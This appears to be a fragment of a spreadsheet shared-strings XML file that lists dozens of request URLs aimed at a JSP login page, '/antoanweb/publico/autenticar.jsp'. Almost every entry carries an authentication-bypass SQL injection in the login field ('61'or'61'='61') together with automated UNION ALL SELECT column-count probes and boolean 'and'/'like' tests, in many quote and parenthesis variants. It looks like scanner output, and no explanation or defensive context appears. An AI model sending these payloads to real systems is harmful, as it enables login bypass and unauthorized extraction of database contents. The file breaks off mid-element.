    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465#and("vjvp"like"vjvp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921,3921#and("tlti"like"tlti&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690,7690#and("dzuv"like"dzuv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703#and("waiz"like"waiz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494#and(("pryw"like"pryw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659,2659#and(("wzpc"like"wzpc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852,5852#and(("rhnl"like"rhnl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467,9467#and(("xiuq"like"xiuq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575,9575#and(("ibww"like"ibww&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384#and(("rxop"like"rxop&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578,8578#and(("rkuo"like"rkuo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241,4241#and(("hjry"like"hjry&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344#and(("kzkh"like"kzkh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026,8026#and(("koxe"like"koxe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177,2177#and((("nwho"like"nwho&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699,5699#and((("jxss"like"jxss&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119,5119#and((("vhpi"like"vhpi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835,9835#and((("chsw"like"chsw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441,8441#and((("zlvh"like"zlvh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912,5912#and((("rjvo"like"rjvo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832,8832#and((("yqzj"like"yqzj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613,2613#and((("voit"like"voit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894,894#and((("ohzw"like"ohzw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413#and((("uown"like"uown&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679#and"vzgn"like"vzgn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694,3694#and"ulsu"like"ulsu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693#and"bgfu"like"bgfu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211,1211#and"clxg"like"clxg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026#and"xbyy"like"xbyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626,626#and"axqx"like"axqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208#and"lobr"like"lobr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155,6155#and"trru"like"trru&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114,6114#and"mpye"like"mpye&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506,5506#and"ktkv"like"ktkv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#and(9134=9134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#and(7270=7270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#and(3410=3410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#and(1594=1594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#and(277=277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#and(3332=3332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#and(9924=9924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#and(2548=2548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#and(1893=1893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#and(2543=2543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#and((5980=5980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#and((8950=8950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#and((2872=2872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#and((4585=4585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#and((1326=1326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#and((2322=2322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#and((3953=3953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#and((1961=1961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#and((6163=6163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#and((9113=9113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#and(((5048=5048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#and(((9407=9407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#and(((7858=7858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#and(((8031=8031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#and(((4960=4960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#and(((6128=6128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#and(((3387=3387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#and(((2856=2856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#and(((7003=7003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#and(((2505=2505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#and('sdyj'='sdyj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#and('jxkv'='jxkv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#and('oaqv'='oaqv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#and('xmqn'='xmqn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#and('cdjl'='cdjl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#and('toqm'='toqm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#and('zevf'='zevf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#and('yhce'='yhce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#and('qhxd'='qhxd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#and('ucpr'='ucpr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#and(('ytxy'='ytxy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#and(('ibnk'='ibnk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#and(('bgcc'='bgcc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#and(('mzhm'='mzhm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#and(('hdmw'='hdmw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#and(('bevt'='bevt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#and(('gple'='gple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#and(('ljoe'='ljoe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#and(('ynbg'='ynbg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#and(('wwkd'='wwkd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#and((('xkxh'='xkxh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#and((('ecem'='ecem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#and((('alqk'='alqk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#and((('nrka'='nrka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#and((('aqer'='aqer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#and((('jvdy'='jvdy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#and((('jjyq'='jjyq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#and((('gxmr'='gxmr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#and((('uksg'='uksg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#and((('sfvd'='sfvd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#and'mmup'='mmup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#and'dvrx'='dvrx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#and'roqb'='roqb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#and'ozhi'='ozhi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#and'niiy'='niiy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#and'oyeh'='oyeh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#and'uwfr'='uwfr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#and'qpzm'='qpzm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#and'cyhe'='cyhe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#and'dsbt'='dsbt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#and('uoyo'like'uoyo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#and('iqqn'like'iqqn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#and('xdcg'like'xdcg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#and('snna'like'snna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#and('zgpd'like'zgpd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#and('wvav'like'wvav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#and('ksuu'like'ksuu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#and('dsxh'like'dsxh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#and('rlpn'like'rlpn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#and('luco'like'luco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#and(('svxy'like'svxy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#and(('hlvx'like'hlvx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#and(('blnj'like'blnj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#and(('jghl'like'jghl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#and(('xout'like'xout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#and(('azfp'like'azfp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#and(('dwpi'like'dwpi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#and(('vsmc'like'vsmc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#and(('azfq'like'azfq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#and(('sdoh'like'sdoh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#and((('ancp'like'ancp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#and((('avfw'like'avfw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#and((('yxng'like'yxng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#and((('tphg'like'tphg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#and((('btiq'like'btiq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#and((('kxkx'like'kxkx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#and((('eaam'like'eaam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#and((('lbes'like'lbes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#and((('mhzy'like'mhzy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#and((('lmhg'like'lmhg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#and'cttf'like'cttf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#and'oqtl'like'oqtl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#and'sdvt'like'sdvt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#and'igge'like'igge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#and'fujy'like'fujy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#and'irqf'like'irqf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#and'kxzf'like'kxzf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#and'zqid'like'zqid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#and'mdma'like'mdma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#and'arfq'like'arfq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#and("tbrt"="tbrt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#and("mhng"="mhng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#and("dsjq"="dsjq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#and("pqbs"="pqb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#and("adxe"="adxe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#and("psur"="psur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#and("spjl"="spjl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#and("qknu"="qknu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#and("nxmm"="nxmm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#and("dmiq"="dmiq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#and(("nnml"="nnml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#and(("ahgd"="ahgd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#and(("wkbr"="wkbr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#and(("yiwp"="yiwp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#and(("vsze"="vsze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#and(("ijgq"="ijgq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#and(("nvmm"="nvmm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#and(("mugu"="mugu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#and(("lzly"="lzly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#and(("rpcb"="rpcb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#and((("jhgm"="jhgm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#and((("jzjm"="jzjm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#and((("lqek"="lqek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#and((("pofh"="pofh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#and((("tdkl"="tdkl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#and((("qdhz"="qdhz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#and((("jkba"="jkba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#and((("kkgy"="kkgy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#and((("vwcu"="vwcu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#and((("wxrz"="wxrz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#and"hmkz"="hmkz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#and"zypn"="zypn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#and"dkil"="dkil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#and"wivk"="wivk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#and"ybar"="ybar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#and"sfid"="sfid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#and"efan"="efan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#and"mgub"="mgub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#and"wead"="wead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#and"givh"="givh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#and("nazq"like"nazq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#and("qhfs"like"qhf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#and("qxgg"like"qxgg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#and("pkko"like"pkko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#and("uvag"like"uvag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#and("kieo"like"kieo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#and("hnez"like"hnez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#and("gmsg"like"gmsg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#and("xkxa"like"xkxa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#and("ujxg"like"ujxg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#and(("hdrc"like"hdrc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#and(("fmtz"like"fmtz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#and(("kaec"like"kaec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#and(("hzoi"like"hzoi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#and(("fnmn"like"fnmn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#and(("pcxr"like"pcxr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#and(("kvzr"like"kvzr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#and(("trjv"like"trjv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#and(("uchy"like"uchy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#and(("jssr"like"jssr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#and((("tqph"like"tqph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#and((("tobr"like"tobr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#and((("wznv"like"wznv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#and((("kgga"like"kgga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#and((("fznx"like"fznx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#and((("oxvi"like"oxvi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#and((("vgbj"like"vgbj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#and((("nttx"like"nttx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#and((("ynjt"like"ynjt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#and((("eobp"like"eobp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#and"dmjy"like"dmjy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#and"zzjq"like"zzjq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#and"loem"like"loem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#and"lnhh"like"lnhh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#and"mewb"like"mewb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#and"gjsj"like"gjsj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#and"svja"like"svja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#and"ybvo"like"ybvo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#and"vibz"like"vibz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#and"ouec"like"ouec&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557,1557#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295,2295#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612,9612#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682,2682#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051,5051#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465,4465#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966,3966#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750,9750#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586,9586#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306,5306#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234,6234#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762,3762#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674,674#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365,3365#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192,5192#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692,2692#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564,6564#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648,3648#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661,4661#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846,2846#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821,7821#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136,3136#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060,2060#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685,5685#&amp;modo=entrar</t>
  </si>
  <si>
